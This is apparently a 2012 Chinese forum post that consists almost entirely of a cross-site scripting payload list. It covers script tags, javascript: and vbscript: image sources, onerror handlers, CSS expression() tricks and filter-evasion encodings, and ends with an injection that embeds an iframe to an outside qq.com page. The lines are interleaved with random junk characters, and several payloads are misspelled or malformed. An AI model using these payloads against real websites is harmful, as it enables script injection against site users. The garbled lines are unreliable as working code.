<script>alert("跨站")</script> (最常用)8 m, A( F$ Q5 a+ B. } w, |
<img scr=javascript:alert("跨站")></img>+ }& y8 K3 W# p
<img scr="javascript: alert(/跨站/)></img>. d1 k- I& |0 @; y7 R
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
; e/ \8 R) n. H: ?" y- Z3 M<img scr="#" onerror=alert(/跨站/)></img>; W' b& M7 }/ x. i7 K4 g
<img scr="#" style="xss:expression(alert(/xss/));"></img>
1 P$ a; J+ z+ Z, v; }; ]7 t0 u<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)6 ?$ l5 I6 t: a+ y) b( K
<img src=vbscript:msgbox ("xss")></img>
6 \' W* g4 X% B# n0 t<style> input {left:expression (alert('xss'))}</style>
( b0 K1 O( S7 R! _+ E<div style={left:expression (alert('xss'))}></div>$ E& M) L9 N; x6 d( F6 W( h) U
<div style={left:exp/* */ression (alert('xss'))}></div>
: y$ y5 ^/ V4 `: M<div style={left:\0065\0078ression (alert('xss'))}></div>
8 J. f3 g( p& P5 v+ [html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>7 t! Q; L% P% M" I6 N% e, `9 ^
unicode <div style="{left:expRessioN (alert('xss'))}">
( n! y) y' C% k8 O$ e. M! ]& Z% R8 p) l
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
- K4 ~: i; p4 Q! l+ k) }$ J: L |
发表于 2012-9-13 17:15:04
收藏
支持
反对